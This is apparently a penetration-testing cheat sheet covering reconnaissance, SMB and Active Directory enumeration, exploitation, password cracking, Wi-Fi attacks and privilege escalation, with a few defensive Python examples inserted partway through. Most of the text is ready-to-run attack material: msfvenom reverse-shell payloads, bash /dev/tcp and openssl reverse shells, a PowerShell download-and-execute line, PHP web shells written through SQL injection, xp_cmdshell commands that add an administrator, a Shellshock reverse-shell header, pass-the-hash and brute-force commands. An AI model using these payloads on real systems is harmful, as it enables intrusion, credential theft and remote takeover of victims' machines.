Recon/Information Gathering
Google Search
Extract ip from host command
Extract domain from index.html
Netdiscover
Nmap explain closed,filtered
Nmap examples
Nmap Scripts
Search for NMAP scripts
Nmap – Options
Nmap – Combos
Port scanning with Netcat
Hping3
Ping and portscan from shell
Gobuster
Dirb
dirb http://10.10.10.1 /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Curl
curl --url "imap://mail.example.com/" --user "bobby:tables"
Upload
curl --upload-file file.txt -v --url <url> -0 --http1.0
Cewl
Find words on a web page that can be used for password cracking.
cewl http://www.site.se -m 6 -w /cewl.txt
The resulting list can then be passed to John the Ripper.
Directory or Path Traversal
192.168.1.1/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd
Null Byte
?page=../../../../../etc/passwd%00
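As an added illustration that is not part of the original cheat sheet, this is the check a server-side include should perform before using a ?page= value like the ones above. WEB_ROOT is an assumed document root and the inputs in main() are constructed to mirror the traversal and null-byte payloads listed.

```python
#!/usr/bin/env python3
"""Added example: safe resolution of a ?page= parameter against path traversal.

Not from the cheat sheet. WEB_ROOT is a hypothetical document root; the
inputs in main() are constructed to mirror the payloads listed above.
"""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/pages"  # hypothetical document root


def resolve_page(param, root=WEB_ROOT):
    """Return the absolute file path for a page parameter, or None if it escapes root.

    1. Percent-decode, so %2e%2e and %00 are judged as the bytes they represent.
    2. Refuse NUL bytes: C-level file APIs stop at NUL while the web language
       does not, and that disagreement is what the %00 trick relies on.
    3. Join to the root, normalise away ../ and check containment explicitly.
    """
    decoded = unquote(param)
    if "\x00" in decoded:
        return None
    root = posixpath.normpath(root)
    relative = decoded.lstrip("/")          # an absolute path must not replace root
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if candidate != root and not candidate.startswith(root + "/"):
        return None                          # resolved outside the document root
    return candidate


def main():
    # constructed inputs: two legitimate pages and three traversal attempts
    for value in ("index.php", "docs/../about.php",
                  "../../../../../../etc/passwd",
                  "../../../../../etc/passwd%00",
                  "..%2F..%2F..%2Fetc%2Fpasswd"):
        print(f"{value!r:40} -> {resolve_page(value)}")


if __name__ == "__main__":
    main()
```

The containment test compares the normalised result against the root with a trailing slash, so a sibling directory such as /var/www/pages2 is not accepted by a plain prefix match.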
Wpscan
wpscan --url http://10.1.1.1/ --enumerate t --enumerate u
wpscan --url http://10.1.1.1 -e --log tenten_wpscan.txt
wpscan --url <url> (scan the CMS)
wpscan --url <url> --enumerate vp (scan vulnerable plugins)
wpscan --url <url> --enumerate vt (scan vulnerable themes)
wpscan --url <url> --enumerate u (enumerate users)
wpscan --url <url> --wordlist pass.txt --threads 50 (brute force)
Metagoofil
metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html
Nikto
nikto -h 10.1.1.1
Droopescan
./droopescan scan drupal -u http://192.168.2.152
Dns
nslookup
server 10.10.10.100
host -t ns domain.se
host -t mx domain.se
host www.domain.se
Zonetransfer
host -t axfr domain.se ns1.domain.se
host -l domain.se 10.1.1.1
zone transfers
host -l server.se ns3.server.se.
Reverse DNS
theharvester -n -d host.se -b all
Dnsenum
dnsenum domain.se
Dnsrecon
dnsrecon -d 10.10.10.100 -r 10.0.0.0/8
Smtp
vrfy
for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 2 192.168.1.1 25 2>/dev/null | grep "^250"; done
Python script to vrfy
#!/usr/bin/env python3
import socket
import sys

if len(sys.argv) != 2:
    print("Usage: vrfy.py <username>")
    sys.exit(0)

# connect to the SMTP service (localhost here) and read its greeting first
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 25))
banner = s.recv(1024)
print(banner.decode(errors='replace'))

# ask the server whether the mailbox exists: 250/252 means yes, 550 means no
s.send(('VRFY ' + sys.argv[1] + '\r\n').encode())
result = s.recv(1024)
print(result.decode(errors='replace'))
s.close()
Smb
Rpcclient
Old
rpcclient -U roger 192.168.1.1
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser roger
Nbtscan
nbtscan -f target
nbtscan -v target (verbose)
Smb enumeration
enum4linux -a 192.168.1.1
Smb nmap
nmap --script=vuln 192.168.1.1 -p445
Smbclient
Look for shares
smbclient -L //10.10.10.100 -U name
smbclient \\\\192.168.1.1\\Share -W DOMAIN -U roger
Smbmap
Locate Shares:
smbmap -H 10.10.10.100
List Files on Share
smbmap -R Replication -H 10.10.10.100
List Files
smbmap -R Replication -H 10.10.10.100 -A Groups.xml -q
smbmap -u username -p 'HASH:HASH' -H 192.168.1.1 -R --download path/to/file.txt
--download  Download a file with smbmap
Smbclient
smbclient //10.10.10.100/Replication
recurse ON
prompt OFF
mget *
Smb impacket
/usr/share/doc/python-impacket/examples/GetADUsers.py -all domain.dc/svc_user -dc-ip 10.10.10.1
/usr/share/doc/python-impacket/examples/psexec.py domain.dc/[email protected]
smbmap -d domain.dc -u svc_user -p password -H 10.10.10.1
/usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.1 domain.dc/svc_user
/usr/share/doc/python-impacket/examples/psexec.py domain.dc/[email protected]
-R  List files recursively
Password from GPO Policy
less /usr/share/smbmap/10.1.1.1/Replication_domain.dc_Policies_\{31B2F340-016D-11D2-945F-00C0aFB984F9\}_MACHINE_Preferences_Groups_Groups.xml
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJa3mjWA98ga9guKOhaOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
(gpp-decrypt prints the decrypted password)
Windows Tips
Run as command
runas /netonly /user:domain.dc\svc_user cmd
Windows Credentials Editor (WCE)
wce64.exe -w
Sharphound
SharpHound.exe -c all -d domain.dc --domaincontroller 10.10.1.1
Find files Windows
where /R C:\ bash.exe
Getting Access and Maintaining Access
Searchsploit
Mirror (copy) an exploit to the current directory
searchsploit -m exploits/php/webapps/18650.py
searchsploit -x exploits/php/webapps/18650.py
searchsploit -p exploits/php/webapps/18650.py
Metasploit
Start the database
service postgresql start
Start Metasploit
msfconsole -q
Background a session: Ctrl-Z or type background
exploit -j
sessions -i
sessions -l
setg sets a global value, e.g. setg RHOST 192.168.1.1
Metasploit Steps
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST ip
set LPORT port
exploit -j
Access the exploit
shell.aspx
shell
systeminfo
Search for suggested local exploits
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
use exploit/windows/local/ms10_015_kitrap0d
set lhost ip
set lport port
Create Payloads
Msfvenom
Linux
msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.1 LPORT=4444 SHELL=/bin/bash -a cmd --platform Unix -e generic/none
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f elf > shell.elf
Windows
msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.1 lport=8888 -f exe > /root/Desktop/1.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.14.10 LPORT=4444 > r2.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.1 LPORT=444 -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.1 LPORT=444 -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=444 -f raw > shell.pl
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Unicorn
Create Payload
python unicorn.py windows/meterpreter/reverse_http 10.1.1.1 8001
Use exploit and create payload
Exploit:
chmod 755 cve-2017-8759_toolkit.py
Create Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6996 -f exe > /tmp/gotcha.exe
Create rtf file from exploit
python cve-2017-8759_toolkit.py -M gen -w Gotcha.rtf -u http://192.168.1.101/gotcha.txt
Host The Payload on our server
python cve-2017-8759_toolkit.py -M exp -e http://192.168.1.101/gotcha.exe -l /tmp/gotcha.exe
Mini webserver with python
python -m SimpleHTTPServer 80
Filedownload
PowerShell
powershell "IEX(new-object net.webclient).downloadstring('http://10.1.1.10/empire.ps1')"
Linux
wget 192.168.1.1:80/attack.txt
curl 192.168.1.1:80/attack.txt > file.txt
fetch http://192.168.1.1:80/attack.txt
Victim > Attacker
nc -lvp 4444 > file.txt
nc 192.168.1.1 4444 < file.txt
Attacker > Victim
Target
nc -nvlp 81 > file.txt
Attacker
nc 192.168.1.1 81 < file.txt
Netcat
Victim:
nc -lvnp 4444 > incoming.exe
Source:
nc -nv 10.0.2.15 4444 </usr/share/windows-binaries/wget.exe
Windows
Tftp
Server
atftpd -v --port 69 --bind-address 10.10.10.2 --daemon /srv/tftp/
Client
tftp -i 192.168.1.1 GET nc.exe
Ftp
On Windows you can script this with a text file:
ftp -s:ftp.txt
ftp 192.168.1.1
binary
ls
get nc.exe
put nc.exe
Reverse Shell
Netcat
Use ncat for SSL support and access rules
Listener
nc -lvnp 4444
Connector
nc -nv 192.168.1.1 4444
Netcat Command execution
Victim
nc -lvnp 4444 -e /bin/bash
Source
nc -nv 10.0.2.15 4444
Netcat Windows to get PowerShell shell
nc64.exe 10.1.1.1 9001 -e powershell
Upgrade from dash or a limited shell
Attacker:
nc -nlvp 9001
Victim
bash -c 'bash -i >& /dev/tcp/192.168.1.1/9001 0>&1'
Once the shell arrives on the attacker side, upgrade it:
python -c 'import pty; pty.spawn("/bin/bash")'
After that:
script -q /dev/null
Then background it with
ctrl z
Then type
stty raw -echo
Then hit fg to bring it back to the foreground
OpenSSL
Create a certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Start the listener on the attacker
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
Start the reverse shell on the victim with openssl
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.1:4444 > /tmp/s; rm /tmp/s
ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx -o shell.aspx
PHP
Create s.php
/*s.php*/
<?php echo shell_exec($_GET['cmd']);?>
Copy nc.exe and s.php to web folder
http://10.10.10.1/s.php?cmd=nc 10.10.14.10 4444 -e cmd
wget 10.1.1.1:80/php-reverse-shell.txt -P /var/www/admin/
mv /var/www/admin/php-reverse-shell.txt /var/www/admin/php-reverse-shell.php
Nice remote shell
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux
If there is no real bash:
ctrl z
background
stty raw -echo
fg
Password
Responder
Set up Responder to listen for clients and capture hashes:
responder
• Default location: /usr/share/responder/
• Stores captured hashes in Responder.db
The captured password hashes can be cracked with John the Ripper.
Capture NTLM hashes via SQL injection
Start smb server On Attacker
impacket-smbserver share $(pwd)
Use this on the webpage:
; use master; exec xp_dirtree '\\10.1.1.1\share';--
Unshadow
sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt
HASHCAT
hashcat -h | grep -i ntlm
hashcat -m 3100 hashes.txt /opt/share/wordlist/rocky.txt
Launch a combinator attack (-a 1, which combines words from two wordlists) against MD5 password hashes (-m 0):
hashcat -m 0 -a 1 /root/hashes/hashes.txt /root/rockyou.txt
A straight dictionary attack (-a 0) is very fast on simple passwords:
hashcat -m 0 -a 0 /root/hashes/hashes.txt /root/rockyou.txt
John The Ripper
john hashes.txt --format=nt --show (crack NTLM)
Use the cewl.txt wordlist in John the Ripper with rules to generate candidate passwords:
john --wordlist=cewl.txt --rules --stdout > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
RSA
Convert the RSA key to John format and save it in a file:
ssh2john rsakey > rsa2johnfile
Crack the passphrase using any wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH rsa2johnfile
When it is done, show the passphrase if it was cracked:
john --show rsa2johnfile
Passwords dumps Windows
Pwdump and FGdump
Crunch: create password lists
crunch 6 6 01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ
Passing The Hash
Passing the hash
pth-*
export SMBHASH=1231234124124124124:1243124124124124124124124
pth-winexe -U administrator% //192.168.1.1 cmd
Medusa
medusa -h 192.168.1.1 -u admin -P password.txt -M http -m DIR:/admin -T 20
Ncrack
Use for RDP brute force
ncrack -v -f --user administrator -P password.txt rdp://192.168.1.1,CL=1
Hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt -u -s 22 10.1.1.1 ssh
hydra 10.1.1.1 -V -l user -P /usr/share/wordlists/rockyou.txt http-get-form "/login.php:username=^USER^&password=^PASS^&Login=Login:F=The password you entered was not valid.:H=Cookie: PHPSESSID=2tr9o96unnmlrgfom8hbaqhp7l; security=low"
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 54415 -I
MySQL
Connect to local database
mysql -u zabbix -D zabbixdb -p
Sqlmap
Use Burp Suite to capture the login request
Save the login request to login.req
sqlmap -r login.req --level 5
Search for databases
sqlmap -u "http://192.168.1.1/index.php?par=" --dbs
Check the privileges of the database users
sqlmap -u "http://192.168.1.124/sqli/Less-1/?id=1" --privileges
Read a file from the web server
sqlmap -u "http://192.168.1.124/sqli/Less-1/?id=1" --file-read=/xampp/htdocs/index.php --batch
Dump usernames and passwords
sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --dump --threads=5
Dump tables
sqlmap -u "http://192.168.1.1/index.php?par=" --dbs -D dbname --tables --dump
sqlmap -u "http://192.168.1.1/index.php?par=" --dbs -D dbname -T tablename --dump
Automated shell
sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --os-shell
sqlmap -u http://10.1.1.1/login.php --forms --level 5 --risk 3 --string "The password you entered was not valid." --dbs --batch
sqlmap -l trace.txt --dbs (RDBMS enumeration)
sqlmap -l trace.txt -D <db> --tables (list tables)
sqlmap -l trace.txt -D <db> -T <table> --dump (dump table content)
Crawl links
sqlmap -u http://192.168.1.1 --crawl=1
sqlmap -u http://192.168.1.1 --forms --batch --crawl=5 --cookie=jsessionid=1234 --level=5 --risk=3
In the browser dev console, find the session cookie with document.cookie, then pass it to sqlmap:
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value copied from the dev console>" --dbs
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value copied from the dev console>" -D moviescope --tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value copied from the dev console>" -D moviescope -T User_Login --columns
Manual sql injection commands
Check for SQLi vulnerability
?id=1'
Find the number of columns
?id=1 order by 9 -- -
Find which columns are output on the page
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -
Get the username of the SQL user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -
Get the version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -
Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -
Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -
Get content from the users table, from the columns name and password (the 0x3a only serves as a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
Read a file
?id=1 union select 1,2,3,4,load_file('/etc/passwd'),6,7,8,9 -- -
?id=1 union select 1,2,3,4,load_file('/var/www/login.php'),6,7,8,9 -- -
Create a file and read it back to check that it was really created
?id=1 union select 1,2,3,4,'this is a test message',6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4,load_file('/var/www/test'),6,7,8,9 -- -
Create a file to get a shell
?id=1 union select null,null,null,null,"<?php system($_GET['cmd']) ?>",6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null,load_file('/var/www/shell.php'),6,7,8,9 -- -
Then go to the browser and see if you can execute commands
http://<targetip>/shell.php?cmd=id
SQL injections
User name                | Password         | SQL Query
tom                      | tom              | SELECT * FROM users WHERE name='tom' and password='tom'
tom                      | ' or '1'='1      | SELECT * FROM users WHERE name='tom' and password='' or '1'='1'
tom                      | ' or 1='1        | SELECT * FROM users WHERE name='tom' and password='' or 1='1'
tom                      | 1' or 1=1 -- -   | SELECT * FROM users WHERE name='tom' and password='1' or 1=1 -- -'
' or '1'='1              | ' or '1'='1      | SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'
' or ' 1=1               | ' or ' 1=1       | SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1'
1' or 1=1 -- -           | blah             | SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah'
'or 1=1#                 | ' or '1'='1      |
blah';insert into login values ('john','apple123'); -- |                  |
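As an added example that is not part of the original cheat sheet, the queries in the table above built both ways against an in-memory SQLite table: login_vulnerable() concatenates the inputs into the statement exactly as the table shows, login_parameterized() binds the same inputs as values. The users table and its two rows are constructed.

```python
#!/usr/bin/env python3
"""Added example: the table's queries built two ways against an in-memory SQLite table.

Not from the cheat sheet. The users table and its two rows are constructed;
login_vulnerable() concatenates like the queries in the table,
login_parameterized() binds the same inputs as values.
"""
import sqlite3


def make_db():
    """Constructed sample data: the 'tom' row from the table plus one more user."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("tom", "tom"), ("alice", "s3cret")])
    return con


def login_vulnerable(con, name, password):
    """String concatenation: user input becomes part of the SQL grammar.

    The password  ' or '1'='1  turns the WHERE clause into
    name='tom' and password='' or '1'='1', which is true for every row.
    """
    sql = ("SELECT * FROM users WHERE name='" + name
           + "' and password='" + password + "'")
    return con.execute(sql).fetchall()


def login_parameterized(con, name, password):
    """Bound parameters: the driver passes the input as a value, never as SQL.

    The same  ' or '1'='1  string is simply compared against the password
    column and matches nothing.
    """
    sql = "SELECT * FROM users WHERE name=? and password=?"
    return con.execute(sql, (name, password)).fetchall()


def main():
    con = make_db()
    cases = [("tom", "tom"),                 # legitimate login
             ("tom", "' or '1'='1"),         # row 2 of the table
             ("tom", "1' or 1=1 -- -"),      # row 4 of the table
             ("1' or 1=1 -- -", "blah")]     # row 7 of the table
    for name, password in cases:
        vulnerable = len(login_vulnerable(con, name, password))
        safe = len(login_parameterized(con, name, password))
        print(f"{name!r:20} {password!r:20} vulnerable={vulnerable} parameterized={safe}")


if __name__ == "__main__":
    main()
```

The row counts make the point: every injected input returns both rows through the concatenated query and none through the parameterized one, while the legitimate tom/tom login returns exactly one row in both.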
Command injections
;ls
sqsh – Interactive database shell for Sybase
Login
sqsh -S 127.0.0.1:123 -U sa -P secretpassword
exec xp_cmdshell 'whoami'
go
exec xp_cmdshell 'net user roger pass /add'
go
exec xp_cmdshell 'net localgroup Administrators roger /add'
go
exec xp_cmdshell 'net localgroup "Remote Desktop Users" roger /add'
go
Shellshock with Burpsuite
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.1/8081 0>&1
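As an added example that is not part of the original cheat sheet, detection logic for the Shellshock header above run over web server logs: the characteristic "() { ... };" function definition is looked for in the request line, Referer and User-Agent, since CGI turns each of those into an environment variable. The log lines are constructed in Apache combined format with documentation IP ranges.

```python
#!/usr/bin/env python3
"""Added example: spotting Shellshock probes like the User-Agent above in web logs.

Not from the cheat sheet. The log lines are constructed (Apache combined
format, documentation IP ranges); the pattern is the "() { ... };" function
definition that a vulnerable bash would evaluate from any environment
variable, which CGI builds from request headers.
"""
import re

# "() {" ... "}" ";" with optional whitespace: the env-var function definition
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache combined log: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# constructed sample lines: one benign request, one probe via User-Agent,
# one probe via Referer (any header that becomes an env var is a vector)
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :; }; bash -i >& /dev/tcp/10.10.14.1/8081 0>&1"',
    '203.0.113.7 - - [10/Oct/2023:13:55:42 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "() { :;}; /bin/true" "curl/7.68.0"',
]


def scan(lines):
    """Return (ip, field, value) for every line carrying the pattern in the
    request line, Referer or User-Agent. Lines that do not parse are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        f = m.groupdict()
        for field in ("req", "ref", "ua"):
            if SHELLSHOCK_RE.search(f[field]):
                hits.append((f["ip"], field, f[field]))
                break
    return hits


def main():
    for ip, field, value in scan(SAMPLE_LOG):
        print(f"{ip} {field}: {value}")


if __name__ == "__main__":
    main()
```

The pattern tolerates the spacing variants seen in the wild ("() { :; };" and "() { :;};"), and checking the Referer as well as the User-Agent matters because the vulnerable code path is the environment variable, not any particular header.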
Snmp
snmpwalk 10.1.1.1 -c public -v 2c
onesixtyone
HEX to TXT and Back
xxd -ps fil.txt > fil.txt.hex
vi fil.txt.hex
xxd -r -ps fil.txt.hex > fil.txt
Stego and Strings
steghide --extract -sf ./Granted.jpg
binwalk -e <file>
java -jar Stegsolve.jar
strings ./HackerAccessGranted.jpg
Stego Links
https://www.dcode.fr/caesar-cipher
https://www.splitbrain.org/_static/ook/
https://incoherency.co.uk/image-steganography/#unhide
Magic Numbers
hex to bin
xxd -r hashdump.txt hex.bz2
Links
https://en.wikipedia.org/wiki/List_of_file_signatures
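As an added example that is not part of the original cheat sheet, the magic-number lookup that the xxd step above does by hand, with a handful of well-known entries from the linked signature list. from_hex_dump() consumes the same plain hex that xxd -r -ps does, and extension_mismatch() is the check an upload handler would run; the sample contents in main() are constructed.

```python
#!/usr/bin/env python3
"""Added example: identify a file by its magic number, the way the linked
signature list is used by hand with xxd.

Not from the cheat sheet. The signature table below holds a handful of
well-known entries from the linked Wikipedia list; the sample bytes in
main() are constructed.
"""

# (magic bytes, canonical extension); the list on Wikipedia is much longer
SIGNATURES = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpg"),
    (b"%PDF-", "pdf"),
    (b"\x7fELF", "elf"),
    (b"PK\x03\x04", "zip"),
    (b"BZh", "bz2"),
    (b"\x1f\x8b", "gz"),
    (b"MZ", "exe"),
]

# extensions that name the same format as a canonical one
ALIASES = {"jpeg": "jpg", "jpe": "jpg", "dll": "exe", "sys": "exe"}


def identify(data):
    """Return the extension whose magic number starts the data, or None."""
    for magic, kind in SIGNATURES:
        if data.startswith(magic):
            return kind
    return None


def from_hex_dump(text):
    """Turn a plain hex dump (what xxd -r -ps consumes) back into bytes;
    whitespace and newlines between the digits are ignored."""
    return bytes.fromhex("".join(text.split()))


def extension_mismatch(filename, data):
    """True when the content is a known type that disagrees with the name.
    Useful as an upload check: a .png that starts with MZ is not an image."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ext = ALIASES.get(ext, ext)
    kind = identify(data)
    return kind is not None and kind != ext


def main():
    samples = {                                  # constructed sample contents
        "avatar.png": b"MZ\x90\x00\x03\x00",     # PE header under an image name
        "photo.jpeg": b"\xff\xd8\xff\xe0\x00\x10JFIF",
        "hashdump.txt": from_hex_dump("42 5a 68 39 31 41 59 26 53 59"),  # BZh9 ...
    }
    for name, data in samples.items():
        print(f"{name:14} {identify(data)!s:6} mismatch={extension_mismatch(name, data)}")


if __name__ == "__main__":
    main()
```

The hashdump.txt sample mirrors the xxd line above: a text file that decodes to bytes starting with BZh is really a bzip2 archive, which is exactly what the mismatch check reports.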
Base64 encode decode
base64 filename.exe > file.txt
base64 -d file.txt > filename.exe
Base64 command and execute
echo ls /home | base64
bHMgL2hvbWUK
echo bHMgL2hvbWUK | base64 -d | bash
ProxyChains
Coming
Chisel
TCP tunnel over HTTP
https://github.com/jpillora/chisel.git
Attacker
chisel server -p 8000 -reverse -v
Client (Victim)
chisel client 172.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Windows Privilege Escalation
systeminfo
hostname
echo %username%
net users
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
Sysinternals
accesschk.exe
net start
net stop
Registry Checks for Passwords
reg query HKLM /f password /t REG_SZ /s >pass.txt
reg query HKCU /f password /t REG_SZ /s >pass.txt
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini
Find writable files
dir /a-r-d /s /b
Empire Setup
git clone https://github.com/EmpireProject/Empire.git -b dev
cd Empire
cd setup
./setup.sh
PowerShell
Invoke-AllChecks
Linux Privilege Escalation
The things I have used from this page are:
# Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -1000 -type d 2>/dev/null
# SGID (chmod 2000) – run as the group, not the user who started it.
find / -perm -g=s -type f 2>/dev/null
# SUID (chmod 4000) – run as the owner, not the user who started it.
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
LinEnum
./LinEnum.sh -t > kali.txt
Commands
cat /etc/issue
cat /etc/lsb-release
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ps aux | grep root
crontab -l
Port forward
ssh -L 8080:127.0.0.1:80 [email protected]
ssh -R 8080:127.0.0.1:80 [email protected]
Binary Exploitation
Tools
OllyDbg
Immunity Debugger
gdb
Binary Ninja
Stacks
Buffers
Fuzzing
Registers
EAX
ECX
EDX
EBX
ESP
EBP
ESI
EDI
EIP Control the path of Code execution
Debug Applications
r2
aaa (analyse all)
afl (list functions)
pdf @ main (disassemble main)
pdc @ main (decompile main to C-like pseudocode)
ldd lists the shared libraries an application links against
ldd /usr/
Ruby pattern create tool
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
Ruby: match the pattern bytes found in EIP to an offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb
Ruby: find the opcode bytes for jmp esp
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP
Shrink Go Binaries
Shrink go binaries
go build -ldflags="-s -w"
and
upx --brute chisel
Tcp dump icmp packets
tcpdump -i eth0 icmp -n
Covering Tracks
Metasploit
Linux tips and tricks
Updatedb
Update database for mlocate
updatedb
Count characters
echo -n asjdflkjalskdjflkjasdfljldkf | wc -c
md5sum
echo -n ' asjdflkjalskdjflkjasdfljldkf' | md5sum
Run a command immune to hangups
nohup
Wireless
### Check Config
iwconfig
### Enable Monitoring
airmon-ng start wlan0
iwconfig
### Looking for AP
airodump-ng wlan0mon
### Looking for Clients
airodump-ng --bssid <ap> --channel <ap channel> wlan0mon
### Start Recording
airodump-ng --bssid <ap> --channel <ap channel> --showack -w wpa_log wlan0mon
### Deauth
aireplay-ng -0 20 -a <ap> -c <client> wlan0mon
## Crack
aircrack-ng wpa_log-01.cap -w /usr/share/wordlists/rockyou.txt
Links
Exploits
https://www.exploit-db.com/google-hacking-database
John The Ripper
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c
Linux Priv Escalation
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Magic Numbers
https://en.wikipedia.org/wiki/List_of_file_signatures
Stego Links
https://www.dcode.fr/caesar-cipher
https://www.splitbrain.org/_static/ook/
https://incoherency.co.uk/image-steganography/#unhide
Github tools
0d1n
Door404
